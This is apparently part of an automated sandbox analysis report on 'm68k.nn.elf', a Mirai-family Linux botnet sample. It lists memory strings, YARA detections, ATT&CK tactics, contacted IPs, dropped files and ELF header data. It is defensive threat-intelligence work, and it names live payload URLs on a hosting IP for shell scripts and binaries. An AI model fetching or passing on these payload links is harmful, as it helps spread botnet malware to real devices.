            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/ping60!/usr/bin/boltctl1/usr/bin/POST/m68k/s10!/usr/bin/qemu-s390x!/usr/bin/sg_dd1
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-riscv64
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-armeb
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/enc2xs0!/usr/bin/vimtutor1/usr/bin/qemu-arm68k/10!/usr/bin/pbget0!/usr/bin/eqn1/usr/bin/transmission-gtk
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-rpctool
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/xzmore0!/usr/bin/btrfsck1/usr/bin/vmware-checkvm10!/usr/bin/xrefresh!/usr/bin/firefox1/usr/bin/cli-ildasmk/s10!/usr/bin/alsatplg!/usr/bin/yelp1/usr/bin/gpgv/m68k/s10!/usr/bin/sha224sum1/usr/bin/isdv4-serial-debugger1/usr/bin/byobu-keybindings0!/usr/bin/gatttool1/usr/bin/xfce4-power-manager-settings1/usr/bin/sensible-editor
            Source: m68k.nn.elf, 6239.1.00007fff26c9a000.00007fff26cbb000.rw-.sdmp, m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/qemu-nios2!/usr/bin/crlupdate10-
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/updatedb1/usr/bin/vmware-toolbox-cmd`!/var/run/screen!/usr/bin/linux32m68k/va10
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /run/vmware
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/byobu-config1/usr/bin/vmware-namespace-cmd`!/usr/bin/ppdpo1/usr/bin/run-with-aspell0!/usr/bin/qemu-armeb!/usr/bin/pf2afm1/usr/bin/systemd-stdio-bridge0!/usr/bin/podselect!/usr/bin/pkcheck!/usr/bin/rfcomm/m68k/us1`#
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/usr/bin/lsattr0!/usr/bin/sg_map1/usr/bin/tblU/m68k/s10!/usr/bin/brltty01/usr/bin/x86_64-linux-gnu-readelf1/usr/bin/min12xxw68k/s10!/usr/bin/obexctl!/usr/bin/uncompress1/usr/bin/perli11ndoc/10!/usr/bin/test0!/usr/bin/qemu-mips641/usr/bin/systemd-analyze
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/dev/vmci
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmhgfs-fuse
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/xlsatoms!/usr/bin/qemu-sparc1Q
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: `!/var/run/apport.lockU1/usr/bin/qemu-ppc64abi32
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /dev/vmci
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/rake0!/usr/bin/ptargrep1/usr/bin/lslogins68k/s10!/usr/bin/ld01/usr/bin/sg_get_lba_status1/usr/bin/setupcon68k/s10!/usr/bin/monodoc-http!/usr/bin/aspell1/usr/bin/grub-mklayouts10!/usr/bin/reset0!/usr/bin/rename.ul1/usr/bin/xfce4-screensaver-command!/usr/bin/geteltorito1/usr/bin/x86_64-linux-gnu-dwp1/usr/bin/gnome-session-custom-session!/usr/bin/snap0!/usr/bin/logger1/usr/bin/foo2oak-wrapper0!/usr/bin/jsonpointer!/usr/bin/mkbundle1/usr/bin/sg_ses_microcode0!/usr/bin/setleds!/usr/bin/newgrp1/usr/bin/git-upload-pack0!/usr/bin/dpkg-divert!/usr/bin/xlsclients1/usr/bin/iceauthm68k/s10!/usr/bin/funzip0!/usr/bin/sg_write_long1/usr/bin/vmware-hgfsclient0!/usr/bin/tr0!/usr/bin/ionice1/usr/bin/mdig/m68k/s10!/usr/bin/foo2ddst1/usr/bin/gimp-test-clipboard-2.01
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/s10 /usr/bin/curl0!/usr/bin/gucharmap1/usr/bin/aconnect68k/s10!/usr/bin/captoinfo!/usr/bin/xlsfonts1/usr/bin/laptop-detects10!/usr/bin/vmware-rpctool!/usr/bin/python1/usr/bin/isovfy/m68k/s10!/usr/bin/dbus-send1/usr/bin/xfce4-appearance-settings1 y
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/10 /usr/bin/tificc0!/usr/bin/csharp1/usr/bin/vmware-vgauth-smoketest+
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-i386
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/proc/6187/exe1/run/console-setup8k/m10!/run/dbus0!/proc/6195/exe1/usr/bin/byobu-enable-prompts0!/run/cups0!/proc/6197/exe1/run/multipathd.pidk/run/cups0!/run/avahi-daemon!/proc/6223/exe1/tmp/vmware-root_721-4290559889exe!/tmp/.Test-unix !/usr/bin/dash1/var/run/snapd-snap.socketin/dash!/tmp/dmesgtail.log!/proc/6224/exe1/var/run/speech-dispatcher
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-or1k
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmwarectrl
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/vmware-namespace-cmd
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /m68k/usr/bin/vmwarectrl
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc64
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-xtensaeb
            Source: m68k.nn.elf, 6239.1.00007fff26c9a000.00007fff26cbb000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/m68k.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.nn.elf
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-xtensa
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-microblazeel
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: !/run/network0!/run/sendsigs.omit.d1/usr/bin/qemu-microblaze
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-alpha_UQ
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-tilegx
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: b_U/m68k/usr/bin/vmwarectrl@
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-sh4eb_U
            Source: m68k.nn.elf, 6239.1.00007fff26c9a000.00007fff26cbb000.rw-.sdmpBinary or memory string: /tmp/qemu-open.lZFn0Y
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64_be
            Source: m68k.nn.elf, 6239.1.0000555f62e9c000.0000555f62f42000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsn32el

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 6239.1.00007fb9b4001000.00007fb9b401c000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 6239.1.00007fb9b4001000.00007fb9b401c000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6239, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 6239.1.00007fb9b4001000.00007fb9b401c000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 6239.1.00007fb9b4001000.00007fb9b401c000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6239, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path Interception1
            File Deletion
            OS Credential Dumping11
            Security Software Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            SourceDetectionScannerLabelLink
            m68k.nn.elf32%VirustotalBrowse
            m68k.nn.elf34%ReversingLabsLinux.Backdoor.Mirai
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            http://94.156.227.233/curl.shm68k.nn.elffalse
              high
              http://94.156.227.233/lol.shm68k.nn.elffalse
                high
                http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sm68k.nn.elffalse
                  high
                  http://94.156.227.233/m68k.nn.elffalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    109.202.202.202
                    unknownSwitzerland
                    13030INIT7CHfalse
                    91.189.91.43
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    91.189.91.42
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                    91.189.91.43dlr.arm6.elfGet hashmaliciousUnknownBrowse
                      mips.elfGet hashmaliciousMiraiBrowse
                        la.bot.arc.elfGet hashmaliciousMiraiBrowse
                          boatnet.i686.elfGet hashmaliciousMiraiBrowse
                            boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                              boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                  arm6.elfGet hashmaliciousMiraiBrowse
                                    dbus.elfGet hashmaliciousUnknownBrowse
                                      fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                        91.189.91.42dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                          mips.elfGet hashmaliciousMiraiBrowse
                                            la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                              boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                  boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                    boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                      arm6.elfGet hashmaliciousMiraiBrowse
                                                        dbus.elfGet hashmaliciousUnknownBrowse
                                                          fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CANONICAL-ASGBdlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                            • 91.189.91.42
                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                            • 185.125.190.26
                                                            boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 185.125.190.26
                                                            boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            arm6.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            CANONICAL-ASGBdlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                            • 91.189.91.42
                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                            • 185.125.190.26
                                                            boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 185.125.190.26
                                                            boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            arm6.elfGet hashmaliciousMiraiBrowse
                                                            • 91.189.91.42
                                                            INIT7CHdlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                            • 109.202.202.202
                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            arm6.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            dbus.elfGet hashmaliciousUnknownBrowse
                                                            • 109.202.202.202
                                                            fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            No context
                                                            No context
                                                            Process:/tmp/m68k.nn.elf
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):53
                                                            Entropy (8bit):3.871459242626451
                                                            Encrypted:false
                                                            SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                            MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                            SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                            SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                            SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:gorilla botnet is on the device ur not a cat go away.
                                                            Process:/tmp/m68k.nn.elf
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):17
                                                            Entropy (8bit):3.6168746059562227
                                                            Encrypted:false
                                                            SSDEEP:3:TgSC/ANln:TglOn
                                                            MD5:CF5BFD6A623ECC046218AA0EBA4D8FE7
                                                            SHA1:E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88
                                                            SHA-256:C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560
                                                            SHA-512:F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:/tmp/m68k.nn.elf.
                                                            File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                            Entropy (8bit):6.408918994917903
                                                            TrID:
                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                            File name:m68k.nn.elf
                                                            File size:111'280 bytes
                                                            MD5:56ee2748af054f2c4cb5cf6be7a309af
                                                            SHA1:194c6758f9d23a1c90ba14ef720be47d8940eace
                                                            SHA256:0ffd845154c04aeace9d2ac859599c813962ac060cc5f3dcf8fdce6cc3842b99
                                                            SHA512:bb7b16c78fb56483e7ad74ae0605b98d85f6c074937bd325a8d429fa78606eee4038dc45e8a16f4e31a0ab4a73feb6116a267866de33851c2d39be4e803d1ef0
                                                            SSDEEP:3072:coOl6MaNeZznwfMeMqs+1M9VoXPbyxJTnKpKDCKzOuhxWmk:8sMmR5jyxNKpKDCKKu+mk
                                                            TLSH:96B35CC6B400DDBDFF1AD6BB04270A19B534A3901F920F37A69BFD97DD621D84826E81
                                                            File Content Preview:.ELF.......................D...4... .....4. ...(.................................. .......................(....... .dt.Q............................NV..a....da...}.N^NuNV..J9....f>"y...0 QJ.g.X.#....0N."y...0 QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN

                                                            ELF header

                                                            Class:ELF32
                                                            Data:2's complement, big endian
                                                            Version:1 (current)
                                                            Machine:MC68000
                                                            Version Number:0x1
                                                            Type:EXEC (Executable file)
                                                            OS/ABI:UNIX - System V
                                                            ABI Version:0
                                                            Entry Point Address:0x80000144
                                                            Flags:0x0
                                                            ELF Header Size:52
                                                            Program Header Offset:52
                                                            Program Header Size:32
                                                            Number of Program Headers:3
                                                            Section Header Offset:110880
                                                            Section Header Size:40
                                                            Number of Section Headers:10
                                                            Header String Table Index:9
                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                            NULL0x00x00x00x00x0000
                                                            .initPROGBITS0x800000940x940x140x00x6AX002
                                                            .textPROGBITS0x800000a80xa80x17dc20x00x6AX004
                                                            .finiPROGBITS0x80017e6a0x17e6a0xe0x00x6AX002
                                                            .rodataPROGBITS0x80017e780x17e780x2c9c0x00x2A002
                                                            .ctorsPROGBITS0x8001cb180x1ab180x80x00x3WA004
                                                            .dtorsPROGBITS0x8001cb200x1ab200x80x00x3WA004
                                                            .dataPROGBITS0x8001cb2c0x1ab2c0x5b40x00x3WA004
                                                            .bssNOBITS0x8001d0e00x1b0e00x223c0x00x3WA004
                                                            .shstrtabSTRTAB0x00x1b0e00x3e0x00x0001
                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                            LOAD0x00x800000000x800000000x1ab140x1ab146.42240x5R E0x2000.init .text .fini .rodata
                                                            LOAD0x1ab180x8001cb180x8001cb180x5c80x28044.99590x6RW 0x2000.ctors .dtors .data .bss
                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 21, 2024 05:31:53.610361099 CET43928443192.168.2.2391.189.91.42
                                                            Dec 21, 2024 05:31:58.986078024 CET42836443192.168.2.2391.189.91.43
                                                            Dec 21, 2024 05:31:59.753709078 CET4251680192.168.2.23109.202.202.202
                                                            Dec 21, 2024 05:32:14.087630987 CET43928443192.168.2.2391.189.91.42
                                                            Dec 21, 2024 05:32:26.374073029 CET42836443192.168.2.2391.189.91.43
                                                            Dec 21, 2024 05:32:30.469692945 CET4251680192.168.2.23109.202.202.202
                                                            Dec 21, 2024 05:32:55.042584896 CET43928443192.168.2.2391.189.91.42

                                                            System Behavior

                                                            Start time (UTC):04:31:52
                                                            Start date (UTC):21/12/2024
                                                            Path:/tmp/m68k.nn.elf
                                                            Arguments:/tmp/m68k.nn.elf
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):04:31:53
                                                            Start date (UTC):21/12/2024
                                                            Path:/usr/lib/udisks2/udisksd
                                                            Arguments:-
                                                            File size:483056 bytes
                                                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                            Start time (UTC):04:31:53
                                                            Start date (UTC):21/12/2024
                                                            Path:/usr/sbin/dumpe2fs
                                                            Arguments:dumpe2fs -h /dev/dm-0
                                                            File size:31112 bytes
                                                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                            Start time (UTC):04:31:53
                                                            Start date (UTC):21/12/2024
                                                            Path:/usr/lib/udisks2/udisksd
                                                            Arguments:-
                                                            File size:483056 bytes
                                                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                            Start time (UTC):04:31:53
                                                            Start date (UTC):21/12/2024
                                                            Path:/usr/sbin/dumpe2fs
                                                            Arguments:dumpe2fs -h /dev/dm-0
                                                            File size:31112 bytes
                                                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4